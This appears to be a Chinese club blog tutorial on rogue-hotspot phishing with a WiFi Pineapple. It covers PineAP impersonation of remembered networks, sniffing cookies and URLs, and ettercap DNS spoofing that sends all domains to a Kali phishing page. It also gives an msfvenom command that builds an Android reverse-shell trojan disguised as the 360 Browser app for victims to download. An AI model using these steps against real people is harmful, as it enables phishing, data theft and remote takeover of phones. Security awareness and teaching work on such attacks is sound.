当前位置:首页 > 未分类 > 正文内容

使用 WifiPineApple 进行范围内 局域网钓鱼

admin2天前未分类5

作者:W22

声明:

仅供参考,勿用于非法用途,否则后果自负,与作者无关。

准备工作:

  1. WifiPineApple,可以在极客之眼的论坛上买一个汉化的。

  1. 两张无线网卡(支持监听模式的功能),推荐 RT3070L,便宜一些;如果有更大需求,可以买功率大一些的。

  1. 一个 USB 集线器,因为 PineApple 上只有一个 USB 接口。

  1. KALI Linux 渗透操作系统。

在进入正题之前,我们需要了解一下 WiFiPineApple 这个设备:

在 WifiPineApple 下有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的 /data/misc/wifi/wpa_supplicant.conf(存放手机记录的热点名称以及密码)文件,来创建 WiFi 热点的名称,它创建带密码 / 不带密码的 2 种,从而导致,附近的其他用户只要开启了 WiFi,就会自动连接到你的 PineApple 上。

下边说明实验的步骤:

0x01 连接 PineApple:

打开 PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。

**img

插入网线或连接建立的热点(一般开机后需要等待 2 分钟左右),使用 web 的方式登陆 PineApple 的默认连接的地址为:http://172.16.42.1:1471

**img

输入账号密码登陆(厂商提供默认口令)

我们看到以下的界面:

**img

0x02 配置网络(重点):

在左侧的菜单栏中选择网络

**img

在网络中我们可以看到当前网卡和 IP 地址获取的情况

**img

我们需要做的配置是:一块网卡用于建立 PineAP 热点,一块网卡用于桥接其他网络,连接外网。还有一块网卡用于连接设备物理接口,和默认建立的 wifi (不能动)

最终达到这样的效果

**img

0x03 进行一些嗅探和欺骗

PineApple 中有很多的插件,都可以进行对连接上的客户机,做一些 “手脚”,例如图片网址获取的功能,他可以获取到用户访问未被 SSL 加密的图片和一些网址的 URL、请求时提交的数据和 cookie 等。

当然,这些功能在 KALI 内手动进行实现,但是通过这个 web 的方式一键搭建,是不是很方便呢?

**img

img

0x04 通过 KALI 来手动进行 dns 劫持,并且伪造钓鱼网页

  1. 启动 KALI Linux 虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子

菜单栏下的编辑 -> 虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备 (连接 PineApple 的设备)

**img

  1. 配置 ip 地址,或者等待 dhcp 自动分配

  1. 可以 ping 通设备后,我们搭建一个 web 服务器 : service apache2 start

  1. 将钓鱼页面放置 /var/www/html 目录下

  1. 接下来,我们启动 ettercap 来进行 dns 欺骗 :

配置 ettercap 文件:

Vim /etc/Ettercap/etter.dns

**img

修改为所有的域名都指向 172.16.42.133 也就是 KALI 的地址

  1. 启动 ettercap  Ettercap -G

Ctrl+U 启动 网卡选择桥接到 PineApple 的网卡

**img

管理插件,并将 dns 欺骗功能启用

**img

img

  1. 这时用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,

当然,如果想要更好的效果的话,可以找一个真实性更好的网页进行测试。

**img

0x05 通过 msf 生成木马,远控手机或 PC。

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.42.133 LPORT=5555 > ~/360浏览器.apk

放在钓鱼页面上,等待用户 “上钩”.

具体的用法可以参考这篇文章

附上我的几个成功的例子(在被允许的情况下)

**img

img

当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。

0x00 结语

引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的 wifi 和确定之前连接是安全的 wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接 (wifi 一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了 SSL 技术进行了加密传输,但是还是有相当一部分没有实现这项功能,所以,例如 QQ 号,还有网络浏览的一些信息以及照片,都可能被泄露,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!!例如:下载未知绑定了木马的 app 可以被攻击者利用获取短信信息 (验证码)、联系人 (诈骗),甚至摄像头 (威胁),所以要提高安全意识,不要在公共场合轻易的连接 wifi,即使是你认为可靠的。

本萌新技术水平有限,可能有些地方讲的不详细,希望大佬们可以理解一下,欢迎指出错误,随时修正并学习。


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=56

分享给朋友:

“使用 WifiPineApple 进行范围内 局域网钓鱼” 的相关文章

(原创)NOIP [全国青少年信息学奥林匹克联赛] 初赛之后的杂谈

(原创)NOIP [全国青少年信息学奥林匹克联赛] 初赛之后的杂谈

没人能比我更懂你。这次的 noip 初赛考的很砸,比数学还砸。深夜的情感就像熬过冬日的野草。我们都在寻找,寻找着一个能够和自己差不多的人,去对他倾诉自己的情感,去倾听他的情感。在一次一次的失败,一次又一次的成功后,留下的只是回忆;在一次次的交流中,一次次的倾听中,留下的是感情。就像我们总是在学习,却...

(原创)Web 渗透实例之中国教育部青少年普法网站逻辑漏洞【网站逻辑漏洞】【网站逻辑漏洞挖掘】【网站逻辑漏洞实例】

(原创)Web 渗透实例之中国教育部青少年普法网站逻辑漏洞【网站逻辑漏洞】【网站逻辑漏洞挖掘】【网站逻辑漏洞实例】

重要声明:此漏洞于 2016 年 12 月 2 号由社团成员挖掘出来,已经第一时间提交到补天,现已修复,发出来仅供学习与讨论,请勿用于非法途径!!!一、漏洞基本信息漏洞关联网站:中国教育部青少年普法网站用户登录界面地址:https://user.qspfw.com具体漏洞页面:用户密码找回界面,地址...

(原创)市教育局 web 渗透 — 市 OA 系统 [web 渗透实例][教育局网络安全][内网安全][内网渗透][oa 系统漏洞]

(原创)市教育局 web 渗透 — 市 OA 系统 [web 渗透实例][教育局网络安全][内网安全][内网渗透][oa 系统漏洞]

一、渗透前置说明(授权与免责)1. 授权声明本次渗透是在取得教育局网络第三方厂商(即时讯立维公司)授权许可之后进行的渗透测试。漏洞报告已第一时间交给教育局及第三方厂商,并协助厂商完成修补,至文章发布时,文中漏洞已修复。本文仅选取漏洞报告部分内容公开,完整漏洞报告模板存放于社团群内部。2. 免责申明请...

(原创)想学黑阔?这些书可以带你飞![web 安全书籍]

(原创)想学黑阔?这些书可以带你飞![web 安全书籍]

这些是我多年前收集的一些 web 安全相关书籍,虽当初未能坚持系统学习,但书籍本身质量较好,现分享给大家,希望能为想学 web 安全的朋友提供帮助!书籍资源获取百度云链接:http://pan.baidu.com/s/1jHVch9O提取密码:bauj...

(原创)求人不如求己 -- 剪辑音乐就是这么简单 [如何剪辑音乐]

(原创)求人不如求己 -- 剪辑音乐就是这么简单 [如何剪辑音乐]

每每到了学校有活动,需要播放歌曲时,QQ 就多几个好友,消息又 99+,不消问什么事情,就知道是找我剪辑歌曲的同学了。怎么说,我这人对别人提出的需求,都尽力去帮助的,在剪辑音乐这事情上,从没拒绝过,但年复一年,每次剪辑音乐其实很简单,但是量多,就比较影响自己时间了,我又不会拒绝别人,很是尴尬,所以...

(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]

(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]

一、熟悉 sqlmap 之路:核心注入场景与方法1. Sqlmap 之 Post 注入Post 注入适用于表单提交(如登录页、数据提交页)等场景,核心是通过抓取 Post 请求数据进行注入测试,以下为 4 种常用方法:方法一:基于请求文件(-r 参数)# 基础用法(请求文件与sqlmap同目录)sq...